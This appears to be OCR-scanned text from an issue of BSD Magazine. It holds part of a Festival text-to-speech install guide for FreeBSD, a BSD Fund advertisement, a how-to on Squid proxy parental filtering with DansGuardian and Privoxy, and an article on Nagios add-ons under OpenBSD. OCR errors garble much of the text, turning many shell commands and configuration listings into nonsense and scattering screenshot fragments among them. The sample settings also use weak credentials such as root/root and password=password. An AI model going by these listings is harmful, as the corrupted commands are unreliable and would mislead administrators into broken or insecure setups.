ci 
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tar ZxXVE. Testival=-2.0.95-bete.tar.gz 


cd festival 








./configure 
gmake 
vewsetill thara dawg? 
After successfully compiling festival source unpack the ae will Here chicié 
remaining required packages: dango 
iphone hat up chatvoice 
bobchatter 7a 
tar zxvf festlex CMU.tar.gz y 1 00! Rackground 
images 


tar z2xvfi festlex POSLEX.tar.gz 


tar Z2XVE. Téstvox kallpclok. tar.gz dango nothing at beach now 


The above will install necessary lexicon and voice files 
into (speech_tools) directory. 


References 


¢ — http://www.cstr.ed.ac.uk/projects/festival/ — Official Festival site 
- _ http://festvox.org/festival — Festival 2.0.95 source download site 





Figure 5. Cool implementation of text to voice technology in Bob 


-  http://www.freebsd.org/ports/index.html — Lame 3.98.4 MP3 Chatter IM Mobile App 
encoder 
- _ http://bobchatter.com - Bob Chatter Mobile IM|Chat 


For speech_tools to successfully compile | had to 
(disable) the following lines. In your path directory speech _ 
| MO . tools/audio/linux sound.cc Comment out line 66-68 and 78- 
file Edit Yiew Terminal Go Help . a 
Teas 80 as shown in Figure 3. 





Testing your Installation 

After all the previous steps have been completed the killer stuff 
begins, testing your installation Figure 4. Run your favorite 
editor and create hello.txt with whatever text and save. Run 
the following command ./text2wave hello.txt. -o hello.wav 
on a successful install a hello.wav file will be created. Since 
.wav files are huge compared to .mp3 encoded files, | will 
install Lame /usr/ports/audio/lame. Once lame make install 
clean is successful, run the following command 1ame hello.wav 





(# Terminal 











S| Terminal 





File Edit View Terminal Go Help hello.mp3 within YOUF festival/bin directory. 

Rca vines saan. a mee In the last screenshot of Figure 4 you will notice the 
Heap oe mater oni psi epee Sake size difference between the hello.wav and hello.mp3 file. 
PC ALIS AS a Cheers to Lame! 


LAME 3.98.2 a ; , 

ee fillies acest Mare rr A ote peeest Aree RL | UA Having read this tutorial you will have a successful 

siperrpe anise Sane Sst bomb yy 2S ye ORE tp A a er installation of the latest Festival on FreeBSD and a great 
, cereblinceiees 6:4 starting point for implementing voice technology into some 

very cool applications or services. One such example is 

the Chat2Voice in the Bob Chatter mobile app Figure 5. 


Chat2Voice converts real-time chat into voice files. 


—_— 
an as lull oe 


DIEGO MONTALVO 

Diego Montalvo is a web/ mobile application developer which 
has developed some interesting concepts. Diego currently 
resides in Brownsville, Texas but finding his way back to sunny 
San Diego California. Next tutorial will be written from the 


Figure 4. Testing Festival Installation, Installing Lame and text to beach! Great day for a cold pint of Guinness! Enjoy the tutorial. 
voice conversion Feel free to contact Diego at diego@earthoid.com 
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Carry the card that 
Supports BSD events 
around the world 






a 
4692 
VALID hth ae 
AN S C 
MEMBER SINCE ODIO 

BSD Fund is proud to sponsor of BSDCan 2010 and 
meetBSD California 2010 thanks to revenue from the 
BSD Fund Visa. A donation is made every time you 


use the card and simply charging your travel to an 
event can help sponsor that event. 








BSD Fund also raises money through direct donations 
on behalf of BSD projects such as the pcc compiler. 


Find our more at www.bsdfund.org 


BSD Fund Visa currently available in the USA + BSD Fund is a 501(c)(3) nonprofit organization 
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Squid proxy with Parental Controls How-To 


Traditionally, web pages were served via a webserver such 
as Apache and transmitted via the network on port 80 to 


a web-browser. 


What you will learn... 
¢ How to install a Squid proxy with parental controls 


hile pages and content were cached in the 
\/\V browser cache, on larger networks it 

made sense to use a caching proxy such 
as Squid to reduce external traffic over the net for 
frequently fetched pages such as Google. This also 
improved the response of the local network, as traffic 
only had to reach the local cache to retrieve popular 
pages. Often, ISP's use other caches on the internet 
to shape the flow of traffic and certain countries use 
a combination of firewalls and proxies with exclusion 
lists to limit the content delivered to their citizens. This 
can also be used in reverse, and a competent user 
can use another proxy elsewhere on a non-standard 
port thereby bypassing the original content filter. It 
is therefore important to lock down the network and 
monitor for any strange activity when content filtering, 
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Figure 1. Squid setup Screen on Webmin 
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What you should know... 
- How to perform a clean FreeBSD install and configure networ- 
king 


unless deep packet inspection is used which is not 
always practical. 

There are a number of ways of configuring Squid to 
intercept port 80 traffic , as a stand-alone proxy, or as 
a transparent proxy. In the former scenario, for all traffic 
to pass through the proxy each client must be configured 
to use Squid, which on large networks with many 
clients can be time consuming if it is not centralised 
e.g. by using a proxy.pac file. This method also had the 
drawback that the user can disable the proxy settings, 
and if the network is not secure, any HTTP traffic will 
then leave unmonitored via the default gateway. A better 
solution would be to use Squid in transparent mode, and 
to redirect all port 80 traffic to the proxy. This also has 
disadvantages, in that the proxy will need to have dual 
network interfaces and the network router/firewall will 
have to be reconfigured to redirect all port 80 traffic to 
the Squid box. As this How-to was inspired by locking 
down my home network for my daughter, | have gone for 
the former method but there is no reason Squid could 
not be adapted to be a transparent proxy — all would be 





Squid executable 
Full path to PID file 
Full path to squid cache directory 


usrlocal/sbin/squid 








usr/local/squid/logs/squid.pid 








var/squid/cache 








Squid cachemgr.cgi executable 


usr/local/libexec/squid/cachemgor.cgi 








Full path to squid log directory 


var/squid/logs 








Figure 2. Squid module config screen on Webmin 
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required is to add firewall support to the FreeBSD kernel 
and IPFW/PF transparent support for Squid. Some 
additional tuning would be required to pass the traffic 
through DansGuardian and Privoxy after Squid, but the 
principle would remain the same. 

We will be using DansGuardian and Privoxy for content 
filtering. DansGuardian is free to use in a personal, 
government or educational environment, but a licence 
needs to be purchased for commercial use. If a totally 
free solution is preferred, SquidGuard could be used 
instead. Webmin is very useful as it will allow us to view 
cache statistics via a browser, and easy add restrictions to 
Dansguardian if desired. 

For this demo, | will be using FreeBSD 8.1 i386. 


Installing FreeBSD 
Proceed with a standard FreeBSD install and install the 
ports tree, configure networking using a static IP address, 
add a user account in the wheel group and install any 
utilities and patches that you favour, such as Midnight 
Commander (mc) and portaudit etc. 

In this install, the IP address of transproxy (transproxy.m 
erville.intranet) is 192.168.0.139. 


Install the packages 
As root: 


pkg_ add -r wget webmin squid privoxy 


Set up and follow the prompts from the script then start 
Webmin: 


/usr/local/lib/webmin/setup.sh 


/usr/local/etc/rce.d/webmin onestart 
Create the squid cache directories and start Squid: 


jusr/ local/sbin/ squid =z 


/usr/local/etc/re.d/squid onestart 
Add the following to your hosts file : 


192.166.0.139 Ctransoroxy transproxy.merrville.intranet 


Configuring Squid 
Login to webmin on port 10000 and browse to Servers/ 
Squid Proxy Server: see Figure 1. 

Amend the paths in Module Config to the following: see 
Figure 2. 

Open a browser, and use 192.168.0.139 port 3128 as 
the proxy. Add 192.168.0.139 to ignored hosts, and you 


www.bsdmag.org 


Misiule Ines 


Ports and Networking 


Loew Co at ete] 


Proxy addresses and ports Default (usually 3128) @ Listed below. 


Cee Options for port 
[jauza | All @ [137.001 








Cea 0 


Figure 3. Squid Ports and Networking screen on Webmin 


should be able to freely browse the internet, and the traffic 
visible in /var/squid/logs/access.log. If you access the 
Cache Manager Statistics (username/password squid) 
and drill down to the Cache Client Lists you will also see 
the hit ratio etc. 


Installing DansGuardian 


mkdir /usr/ports/distfiles 

cd /usr/ports/distfiles 

wget http://dansguardian.org/downloads/2/Stable/ 
dansguardian-2Z.10.1.1.tar.gz 

cd /usr/ports/www/dansguardian 


make install clean BATCH=YES 


Browser HTTP Data flow using multiple filters 


\ 


Privoxy 
Nuisance Ads 





Web content 


Figure 4. Data flow through the proxy 
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Proxy Configuration {gnored Hosts 


Direct internet connection 


*) Manual proxy configuration 


Use the same proxy for all protocols 


HTTP proxy: |192.168.0.139 





Secure HTTP proxy: | 





FTP proxy: 


| 


Socks host: | 





Automatic proxy configuration 


Figure 5. Client browser proxy settings 


lf you require extensive control over DansGuardian, 
download the DansGuardian Webmin module from 
sourceforge.net and install via the Webmin Modules 
link. You will have to modify the paths and directory 
permissions to reflect the FreeBSD install. 

Tune the 
configuration file: 


/usr/local/etc/dansguardian /dansguardian 


filterip 192 «166.0 4139 
filterport = 3129 


proxyip 192 3,16650.139 
proxyport = 8118 
daemonuser = 'nobody' 
daemongroup "nobody' 


loglocation = '/var/log/dg.log' 
statlocation = '/var/log/dg.stats' 
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Figure 6. Squid log 
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tod) 5 

.656 283b1446 Header: : X-XSS-Protection: 1; mode=block 

ojos eRe ls ese tae an: X-Cache: MISS from transproxy.merville.intranet 

.656 283b1440 Header: : Via: 1.6 transproxy.merville.intranet:3128 (squid/2.7.STABLE9) 
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.926 283b6T46 Header: s : GET veers sedetiies pboar.. fare eon) 


.928 283b8f40 Header: scan: Host: 
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Figure 7. Privoxy log 


accessdeniedaddress = 'http://transproxy/cgi-bin/ 


dansguardian.pl' 


cd /var/log 

mkdir dg 

chown root:nobody dg 
chmod 770 dg 


/usr/local/etc/rce.d/dansguardian onestart 


Modify Squid so it only listens on port 127.0.0.1:3128 see 
Figure 3. 

Open the /usr/local/etc/privoxy/config file and change the 
listen address to match the following: 





listen-address 192.168.0.139:8118 
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Figure 8. DansGuardian log 
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Add a forward statement to push Privoxy's output 
through Squid 
127.0.0.1:3128 


forward j 


Comment out the debug lines so we can monitor the 
traffic: 


debug 1 

debug 1024 
debug 4096 
debug S192 


Add the following lines to rc.conf so all services will start 
on boot: 


squid _enable="YES" 
privoxy enable="YES" 
dansguardian enable="YES" 


webmin enable="YES" 


Change the proxy on your client from port 3128 to 3129. 
Ensure everything starts OK: 


/usr/local/etc/rce.d/squid onestop 
/usr/local/etc/rce.d/dansguardian onestart 
/usr/local/etc/rc.d/privoxy onestart 


/usr/local/etc/re.d/squid onestart 
In three separate terminals, view the outgoing traffic: 
tail -f /var/log/dg/dg.log 


tail -f /var/squid/logs/access.log 
tail -f /var/log/privoxy/logfile 


You should now have a cached, content filtered proxy 
with advert removal. Reboot the box. 
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Figure 9. Privoxy GUI 
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Final testing and additional tweaks 
Checks: 


¢ Go to a site with lots of adverts. Most of these should 
be removed with Privoxy. Ensure noscript/adblock is 
turned off if you are running Firefox etc. 

¢ Go to a known bad site, e.g. playboy.com and ensure 
the content is filtered 

¢ Go to a known good site and ensure all content 
downloads OK. 


The following improvements would be beneficial: 


1. Lock down Privoxy so only Squid can access it — this 
can be done via the config file or using a firewall rule 

2. Automate the retrieval of the latest blacklists and 
phrase-lists from dansguardian and blacklist.org 

3. Add further ACL's to Squid to prevent access after 8: 
00 pm etc. on certain PC's 

4. Tune the exception lists / sensitivity of the proxies to 
your own taste. 

5. Handle HTTPS traffic better 


ROB SOMERVILLE 

Rob Somerville has been passionately involved with technology 
both as an amateur and professional since childhood. 
A passionate convert to *BSD, he stubbornly refuses to shave 
off his beard under any circumstances. Fortunately, his wife 
understands him (she was working as a System/36 operator 
when they first met). The technological passions of their 
daughter and numerous pets are still to be revealed. 
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with Nagios and OpenBSD 


Network monitoring 


So our OpenBSD-based network now includes redundant firewalls (http:// 
www.kernel-panic.it/openbsd/carp/index.html), domain name servers 
(http://www.kernel-panic.it/openbsd/dns/index.html), a mail gateway 
(http://www.kernel-panic.it/openbsd/mail/index.html) and a web proxy 
cache (http://www.kernel-panic.it/openbsd/proxy/index.html). 


What you will learn... 
¢ Installing Nagios 
¢ How to monitor network with Nagios and Open BSD 


ne of Nagios’ key features is its extensibility; new 
C) functionality can be easily added thanks to its 

plugin-based architecture, the external command 
interface and the Apache (http:/~www.kernel-panic.it/ 
openbsd/nagios/htipd.apache.org/) web server. In this 
chapter, we will take a look at a few common issues that 
can be addressed with some of the most popular addons 
(http://www.nagiosexchange.org/) for Nagios. 


NRPE 

Suppose you want Nagios to monitor local services on 
remote hosts, such as disk space usage, system load or the 
number of users currently logged in. These are not network 
services, so they can't be directly checked out with standard 
plugins: what we would need is some kind of agent to install 
on remote systems and that Nagios could periodically 
query for the status of local services. Well, that's exactly 
what the Nagios Remote Plugin Executor (NRPE Attp: 
//www.nagiosexchange.org/cgi-bin/page.cgi?g=Detailed/ 
1556.html;d=1) does: it allows you to execute local plugins 
on remote hosts! It is made up of two components: 


¢ an agent, running (either standalone or under ineta(s) 
http://www.openbsd.org/cgi-bin/man.cgi?query=inet 
d&sektion=8) on the monitored host, which waits for 
incoming connections, executes the requested checks 
and returns the status of the local services; 
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What you should know... 
- Agood knowledge of OpenBSD administration 
¢ Basic MySQL database administration 


° a plugin, check nrpe, used by Nagios to query the 
remote agents. 


Both the agent and the plugin are available from the 
following package: 


Nnrpe=x .x sx. Gz 


In addition, the Nagios plugins package will be installed 
on the monitored host as a dependency: this will allow 
the NRPE agent to take advantage of the standard 
Nagios plugins to perform local checks. The package 
installation automatically creates the nrpe user and 
group that the daemon will run as and copy a sample 
nrpe.cfg Configuration file in /etc/: see Listing 16. To run 
NRPE as a standalone daemon, simply type: 


# /usr/local/sbin/nrpe -c /etc/nrpe.cfg -d 


and add the following lines to /etc/rc.local to start it 
automatically after reboot: 


/etc/rc.local/ 
if [ -x /usr/local/sbin/nrpe ]; then 

echo -n ' nrpe' 

/usr/local/sbin/nrpe -c /etc/nrpe.cfg -d 
fi 
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Listing 16. The package installation and copy asample configuration file 


/etc/nrpe.cfg 

# The syslog facility that should be used for logging 
purposes 

Tog traci lity—dacnon 

# Path to the pid file (ignored if running uder inetd) 

pid file=/var/run/nrpe.pid 

# Address £O bind ~o, to avoid binding on ail 
interfaces (ignored if running 

# under inetd) 

Seiver dddusss— ii hoe Un.) 

# Port to wait connections on (ignored if running under 
inetd) 

Servens cont 006 

# User and group the NRPE daemon should run as (ignored 
if running under inetd) 

Mepewiser— mires 

MEE  CrOUP = mkpe 

# Comma-delimited list of IP addresses or hostnames 
that are allowed to connect 

# to the NRPE daemon (ignored if running under inetd) 

el Vowedminests— iz) 02 Oe iyi 7 koe Gd 

# Don't allow clients to specify arguments to commands 
that are executed 

dont, blanc mrpe=0 

# Uncomment the following option to prefix all commands 
with a specific string 

#command prefix=/usr/bin/sudo 

# Don't log debugging messages to the syslog facility 

debug=0 

# Maximum length (in seconds) of executed plugins 

command timeout=60 


4 COnINana Gelinibilons are in the 1 1orm 


# 

# command [<command_name>]=<command_line> 

# 

# Thus, when the NRPE daemon receives a request to 

execute the command 

F) Command Name", it will ron phe “local* script 
Sspecimed Dy “command line”. 

# Note: macros are NOT allowed within command 
definitions 

command eheck) wees | —/tsn/ local libexee/magios/ cieck) 
USS Gs saa ome ae) 

Command eheeky loadi|—/ts1/ local) libexec/magies/ ciecks 
kewl UO Same oe. 0) 

command] Checkwdiskl|=/usi/ local] libexee/ magios/ check) 


disk =w 20 =c 10° =o /dev/wd0a 


command[check total procs]=/usr/local/libexec/nagios/ 


Cheek ou@eo an) 0 te 20 


Listing 17. Editing configuration file 


/etc/nsca.cfg 
# Path to the pid file (ignored if running under inetd) 
pid file=/var/run/nrpe.pid 


# Address to bind to (optional) 
Seiguieg eolelassea i 12 silo ais Ios 
# Port to wait connections on 


Sever POEt—oo0) 


# User and group the NSCA daemon should run as (ignored 
if running under inetd) 
Misa muiser—  WMagues 


nsca group= nagios 


# chroot (2) directory for the NSCA daemon 


nsca_chroot=/var/www/var/nagios/rw 


# Don't log debugging messages to the syslog facility 
debug=0 


# Path to the command file (relative to the chroot 
directory) 

command tile=nagios . end 

# File where to dump service check results if the 
command file does not exist 


alternate dump tle=nsca-dunip 


# Do not aggregate writes to the external command file 
eggpegate iii weec—0 
# Open the external command file in write mode 


epeend) eoumle—0 


# Maximum packet age (in seconds) 


Max Packeuvage—a) 


# Password to use to decrypt incoming packets 

password=password 

# Decryption method (16 = RIJNDAEL-256). It must match 
the encryption method 

# used by the client 

decryerlon merned—16 
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Alternatively, you can run NRPE under inetacs) (hAttp:// 
www.openbsd.org/cgi-bin/man.cgi?query=inetd&sektion 
=8) by adding the following line in /etc/inetd.cont (8) (Attp:// 
www.openbsd.org/cgi-bin/man.cgi?query=inetd.conf&se 
ktion=8): 


fecce/inétd.cont 


nrpe stream tcp wait _nrpe: nrpe /usr/ 


local/sbin/nrpe nrpe -c /etc/nrpe.cfg -i 

and by adding the nrpe Service IN /etc/services(5) (http:/ 
/www.openbsd.org/cgi-bin/man.cgi?query=services&se 
ktion=5): 


/etc/services 


nrpe 5666/tcp # Nagios Remote Plugin Executor 
and then send the inetas) (http:/www.openbsd.org/ 
cgi-bin/man.cgi?query=inetd&sektion=8) daemon the 


hangup signal, instructing it to re-read its configuration: 
# pkill -HUP inetd 


Now, on the Nagios server, you can perform checks 
using NRPE simply by defining commands such as 
the following (only make sure that the command name 
passed to the -- option has a corresponding command 
definition in the nrpe.cfg file on the remote host!): 


/var/www/etc/nagios/commands.cfg 

define command { 
command name check-diskl-nrpe 

SUSER1$/check nrpe -H S$HOSTADDRESS$ -c 


check diskl 


command line 


} 


NSCA 

Now suppose you want to monitor the correct execution 
of a process on a remote host, like a scheduled backup or 
a crontab job. This is still a /oca/ service, but, unlike disk 
space usage or system load, it would probably sound more 
logical to make it the responsibility of the job itself to notify 
Nagios of its exit status. That's the perfect job for the Nagios 
Service Check Acceptor (NSCA), which is a daemon 
program, meant to run on the Nagios server, designed to 
accept passive service check results from clients. 

NSCA is similar to NRPE in that it is made up of 
a daemon process and a client application, but now 
the roles are inverted: the daemon process runs on the 
Nagios server while remote hosts use the sena_nsca utility 
to communicate their status to the daemon. NSCA then 
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forwards the check results to Nagios through the external 
command interface (so make sure you have enabled 
external commands in the main configuration file). 


Server configuration 

NSCA can run either as a standalone daemon or under 
ineta(s) (Attp:/www.openbsd.org/cgi-bin/man.cgi?query=i 
netd&sektion=8). To install the server component we need 
to add the following packages on the Nagios server: 


" <Mhbeshiaxs. sugZ 


LIUbMerypL=ksksk.0gzZ 


°° nSca-x.x.tgz 


Next, we need to edit the /etc/nsca.ctg Configuration file: 
see Listing 17. You should set restrictive permissions (600) 
on the configuration file in order to keep the decryption 
password protected. To run NSCA as a standalone 
daemon, simply type: 


# /usr/local/sbin/nsca -c /etc/nsca.cfg 


and add the following lines to /etc/rc.ioca1 to start it 
automatically after reboot: 


jeto/roeiiocal 
if [| -x /usr/local/sbin/nsca ]; then 
echo -n ' nsca' 


/usr/local/sbin/nsca -c /etc/nsca.cfg 


Alternatively, you can run_ it under 
(http://www.openbsd.org/cgi-bin/man.cgi?query=inetd&s 
ektion=8) by adding the following line in /etc/inetd.con£(8) 
(http://www.openbsd.org/cgi-bin/man.cgi?query=inetd.c 
onf&sektion=8): 


inetd(8) 


/etc/inetd.conf 


nsca stream tcp wait _nagios: nagios /usr/ 


local/sbin/nsca nsca -c /etc/nsca.cfg --inetd 

and by adding the nsca Service in /etc/services(5) (Attp:// 
www.openbsd.org/cgi-bin/man.cgi?query=services&sek 
tion=5): 


/etc/services 


nsca 5oG1/ tcp # Nagios Service Check Acceptor 
and then send the inetas) (http:/www.openbsd.org/ 
cgi-bin/man.cgi?query=inetd&sektion=8) daemon the 


hangup signal, instructing it to re-read its configuration: 
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Listing 18. The database creation script 


# cp /usr/local/share/mysgl/my-medium.cnf /etc/my.cnf 
7? usr 1ocal/bin/mysds install jap 
Peete oh 
# mysqld safe & 
Starting mysqld daemon with databases from /var/mysql 
¢ 7st lecal/Din7myeqs secure anecallacion 
Renal 
Enter current password for root (enter for none): 
Se ieie 
PEvert 
Set foot password? |Y/m]| ¥ 
New password: root 
Re-enter new password: root 
ternal 
Remove anonymous users? [Y/n] Y 
i eed 
Disallow root login remotely? [Y/n] Y 
eae at 
Remove test database and access to it? [Y/n] Y 
[fk eeeewil 
Reload privilege tables now? [Y/n] Y 
Peer 
# mysql -—W Toot =p 
password: root 
Welcome to the MySQL monitor. Commands end with ; or 
VG 
Server version: 5.0.5la-log OpenBSD port: mysql-server- 


50 pola 


Type 'help;' or '\h' for help. Type '\c' to clear the 
Dither: 


mysql> create database nagios; 


Query OK, 1 row affected (0.02 sec) 


mysql> Wse nagios; 

Database changed 

mysql \= sdo/mysqlasal 

eeeta) 

mysql> GRANT SELECT, INSERT, UPDATE, DELETE ON nagios.* 
TO 'ndouser'@'localhost' IDENTIFIED 
By 'ndopasswd"; 

mysql \Gq 


Listing 19. Editing the NDOMOD configuration file 


/var/www/etc/nagios/ndomod.cfg 
instanee nName—derauly 
SUL CUI ey pe-Unixsocke 


output=/var/nagios/rw/ndo.sock 


Cub eur bur rer sa rens—5000 


buffer file=/var/nagios/rw/ndomod.tmp 


ile VeOtarlon interval —14400 


HS eCwat on. wie oul ol) 


BECONNEeE iter yal—i5 
PeCOnmMeC us Weanling  liliserav. alt 13 
data yprocess ing oprlons——! 


CONG OULpULL Opt lons—3 


Listing 20. The NDO2DB configuration file 


/var/www/etc/nagios/ndo2db.cfg 
lock file=/var/run/nagios/ndo2db.lock 


NdoZeb wiser Nagios 


ndeZzdb Group— Nagios 


SOCKe byt ype—lnux 


socket _name=/var/www/var/nagios/rw/ndo.sock 


dbyserverkype-mysq! 
db yhest—Vocal host 
db pont=5206 

dbo name=nagios 

dbp renx—agtos 7 

db yUser—ndeuser 


do pass=ndopasswd 


max timedevents age=1440 

max systemcommands age=10080 

Max Ssemrcechocks jage-10060 

max Hos teheeks —age—1006) 

max eventhandlers age=44640 

debuigmlevel—0 

debucy Venbostry=| 

debug _file=/var/www/var/log/nagios/ndo2db.debug 
Max debug mle semze—k)O0000 
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# pkill -HUP inetd 


Client configuration 
On the client side, we need to install the following 
packages: 


* =¢m@hash=<.x.%.t90z2 


Le pmiery pe=x 2.2 


* wnsca-client-x.x.tgz 


and edit the encryption parameters in the /etc/send _ 
nsca.cfg configuration file: 


/etc/send nsca.cfg 

# Password to use to encrypt outgoing packets 
password=password 

# Encryption method (16 = RIJNDAEL-256) 
encryption method=16 


The send nsca Utility reads data from standard input and 
expects, for service checks, a tab separated sequence 
of host name, service description (i.e. the value of the 
service description directive in the service definition), 
return code and output; e.g.: 
echo "wwwl\tbackup\t0\tBackup completed successfully" | \ 
/usr/local/libexec/nagios/send_nsca -H nagios.kernel- 


Panic. 1 


and, for host checks, a tab separated sequence of host 
name, return code and output; e.g.: 


echo “routerl\t2\tRouter 41 is down” | /usr/local/libexec/ 
nagios/send nsca -H \ 


nagios.kernel-panic.it 


You can override the default delimiter (tab) with sena_ 
nsca's -d Option. Now, if everything is working fine, each 
message received by the NSCA daemon should produce 
a line like the following in the Nagios log file: 


/var/www/var/log/nagios/nagios.log 
[1167325538] EXTERNAL COMMAND: PROCESS SERVICE CHECK RE 
SULT; wwwl;backup;0;Backup completed successfully 


NagVis and NDO 

NagVis is a visualization addon for Nagios; it can be used 
to give users a graphical view (http:/Awww.nagvis.org/ 
doku.php?id=screenshots) of Nagios data. It requires the 
installation of PHP (http:/www.kernel-panic.it/openbsd/ 
nagios/www.php.net/) and a few libraries: 
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Libxml—x.s.2.0gz 

jag Oi Ns ay are ary ay 09 
jJpeg-x.tgz 

PuG-s.2.2.0902 
php5-core-x.x.x.tgz 
phps-qd-x.x.2-no xllsigz 
mysql=-client=-x.x%.%.tgz 


phpS-mysql-x.s.x.0gz 


Apache is already up and running, so we only need to 
enable the php modules we have just installed: 


# In -s /var/www/conf/modules.sample/php5.conf /var/www/ 
conf/modules 

# In -fs /var/www/conf/php5.sample/gd.ini /var/www/conf/ 
php5/gd.ini 

# In -fs /var/www/conf/php5.sample/mysql.ini /var/www/ 
conf/php5/mysql.ini 


uncomment the following line in /var/www/conf/httpd.conf: 


/var/www/conf/httpd.conf 
AddType application/x-httpd-php .php 


and restart Apache: 


# apachectl restart 


/usr/sbin/apachectl restart: httpd restarted 


Installing NDO and MySQL 

Prior to version 1.0, NagVis was able to pull data from Nagios 
directly from its web interface; now this is not supported 
anymore and NagVis expects monitoring data to be stored 
in a MySQL database, thus requiring the intallation of the 
Nagios Data Output Utils (NDOUTILS) addon. 

The NDOUTILS addon allows you to export current 
and historical data from one or more Nagios instances to 
a MySQL database, thus providing the interface between 
Nagios and MySQL. This addon consists of several parts, 
but we will need only two of them: 


¢ the NDOMOD event broker module, which is loaded 
by Nagios at startup and dumps all events and data 
from Nagios to a Unix or TCP socket; 

¢ the NDO2DB daemon, which is a standalone daemon 
and reads the output produced by the NDOMOD 
module through the Unix or TCP socket and dumps it 
into the database. 


First off, we need to install MySQL; the following is the 
list of the required packages: 
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Listing 21. The NDO2DB configuration file 


/var/www/nagios/nagvis/etc/nagvis.ini.php 


; <-plip geturn 15. 2> 


[global | 

language Soe nO 
refreshtime = 60 

dateformat = i eH ane? 
[defaults] 

backend =) adomy i” 


, Détault. 1mcons “size (acons Can’ be found an 


; /var/www/nagios/nagvis/images/iconsets) 


MEOnS =e) co ime cai 
recognizeservices = 1 
onlyhardstates = 0 
backgroundcolor = "fff" 
eCOnrextmenw = 1 
eventbackground = 0 
eventhighlight = ] 


eventhighlightduration = 10000 
eventhighlightinterval = 500 


eventlog = 0 
eventloglevel = Or 
eventlogheight = 75 
eventloghidden = 1 
eventscroll = 1 
eventsound = 1 
headermenu = 1 
headertemplate = "default" 
hovermenu = 1 
hovertemplate = "default" 
hoverdelay = 0 
hoverchildsshow = 1 
hoverchildslimit = 10 
hoverchildsorder = "asc" 
hoviememaids Somme = "3s" 

Leons = Se bde Med um 5 
onlyhardstates = 0 
recognizeservices = 1 
showinlists = 1 

ienineeg eit = eco lene 
Nes tuiel = 


"(htmlcgi]/status.cgi?host=[host_ name]” 

hestqroupurd = 
"(Thtmlcgi]/status.cgi?hostgroup=[hostgroup name]" 
serviceurl = "(htmlcgi]/extinfo.cgi?type=2 
(est = (host mane icseryice—|sery tee deserter Ten) = 
servicegroupurl = "|htmleqa)/ status cgi? 


Seb yucCequelip= sek yicequelpanane|éstyle-deram.y 





[wu | 

autoupdatefreq = 25 

maplocktime = 5 
allowedforconfig = nagiosadmin 
[paths] 

base = "/nagios/nagvis/" 
htmlbase = "/nagios/nagvis" 
hemleqa = 7 egi-biny hagios” 
[index] 

backgroundcolor = #f£ff 
cellsperrow = 4 

headermenu = 1 

headertemplate = "default" 
showrotations = 1 

[automap | 

defaultparams = "&maxLayers=2" 
showinlists = 0 

[worker | 

interval = 10 
requestmaxparams = 0 
requestmaxlength = 1900 
updateobjectstates = 30 

[backend ndomy 1] 

backendtype = "ndomy" 

dbhosy a ee Oe? 
dbport = 3306 

dbname = "nagios" 

ebuses = "ndouser” 

dbpass = "ndopasswd" 
dbprefix == Hage. 
dbinstancename = "default" 
maxtimewithoutupdate = 180 

ici Ml Cal = Cgi-bany wagios” 


; In this example, the browser switches between the 
"dmz' and 'lan' maps every 

; 15 seconds. The rotation is enabled by specifying 
the URL: 

s https: / / your. nagios. server) nagios/maqvis/ 
index.php?rotation=kp 

[notation kp] 

maps =) 7omz, Lan” 


ks 


II 


interval 





www.bsdmag.org 


BSD : 


MAGAZINE 





Next, 
project/showfiles.php?group_id=26589), 


HOW TO’S 


po-Net-Daemon-x.x.tgz 
poO-PIRPC=%.x%.0g2 
bo-DBI-x.S.cgZ 
po-DED=mysql=2.%.tgz 


mysql-server-x.x.x.tgz 


we need to download (http://sourceforge.net/ 


extract and 


compile the NDOUTILS tarball: 


# tar -zxvf ndoutils-x.x.x.tar.gz 


[ 


| 


it 
it 


= 


[ 
it 


ed ndoutils-x.x.x 
./configure --disable-pgsgl --enable-mysql --with-mysql- 
lib=/usr/local/lib \ 
--with-mysgl-inc=/usr/local/include 
| 


make 


Note: if maxe fails to compile the adbnandiers.c file, try 
installing this patch (http://www. kernel-panic.it/openbsd/ 
nagios/ndo-openbsd.patch applies to version 1.4b9) by 
running the following command from outside the ndoutils 
source tree: 








Listing 22. A sample map configuration 


/var/www/nagios/nagvis/etc/maps/dmz.cfg 
# The 'global' statement sets some default values that 
will be inherited by all 
# other objects 
define global { 
# List of users allowed to view this map 
allowed Wser—nagtesacmin, epveraton 
# List of users allowed to modify this map via the web 
interface 
allowed for config=nagiosadmin 
# Defaul iconset (if omitted, it is inherited from the 
main configuration file) 
PeCnser—sta ened um 
# Background image 
map image=dmz.png 
} 
# Display the status of our 'wwwl' web server 
define host { 
host _name=wwwl 
# Coordinates of the host on the map 
x=268 
y=166 
# Set this to '1' if you want the host status to also 
include the status 
# of its services 
Recognize goer mecs—() 
} 
# Display the status of the 'WWW' service on the 'wwwl' 
web server 
define service { 
host _name=wwwl 
service descriptron—wwy 
x=588 
y=165 


# As you can see, 'global' options can be overridden 
in subsequent objects 
HeOMSCu Smeg olilanlr 
} 
# Display the worst state of hosts in the 'WWW' hostgroup 
define hostgroup { 
hostgroup_name=WWW 
x=298 
y=363 
ESCcegmmnAa oer ices — | 
} 
# Display the worst state of services in the 'www- 
services' servicegroup 
define servicegroup { 
SekviICegroup Nelle -wwwssery ices 
x=609 
y=363 
} 
# Display the worst state of objects represented in 
another NagVis map 
define map { 
map name=lan 
x=406 
y=323 
} 
# Draw a textfield on the map 
define textbox { 
# Text may include HTML 
text="This is the DMZ network" 
x=490 
y=394 
w=117 
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Listing 23a. A plugin to monitor the amount of free memory on the local machine 


/usr/local/libexec/nagios/check free mem.sh 


#1 /bin/ ksh 


Heeeeeeeeeeeee etree eetee de eaete ae teeta ad teat ee RHEE EERE 

# Sample Nagios plugin to monitor free memory on the 
local machine e 

# Author: Daniele Mazzocchio (http://www. kernel- 
Danie 167 ) # 

Heeeeteeeeeeeeeeeteeaeeetee teeta ae teeta ad teeta ae tHE EE EEE 


VERSION="Version 1.40” 
AUTHOR="(c) 2007-2009 Daniele Mazzocchio (danix@kernel- 


Danie wisk,) 7 


PROGNAME='/usr/bin/basename $0‘ 


# Conseants 
BYTES IN MB=$(( 1024 * 1024 )) 
KB IN MB=1024 


# Exit codes 
STATE OK=0 

STATE WARNING=1 
otter 2 
STATE UNKNOWN=3 


# Helper functions ###HHttttttteeeeeee eee e eT EET 


RUMCETON PLE revise LO, 
# Print the revision number 


echo "SPROGNAME - SVERSION" 


TUnCELeH Print wsage 7 
# Print a short usage statement 


echo “Usage: sPROGNAME [—-v]\—-w <lamit> —c¢ <limic>™ 


FUNCT TON print) hele | 
# Print detailed help information 
Prime revisien 
echo "SAUTHOR\n\nCheck free memory on local machine\ 
al 


Prine Wsage 


/ oun) Caen HOw 


Oprloms: 
eal 

Print detailed help screen 
=a 


Print. version information 
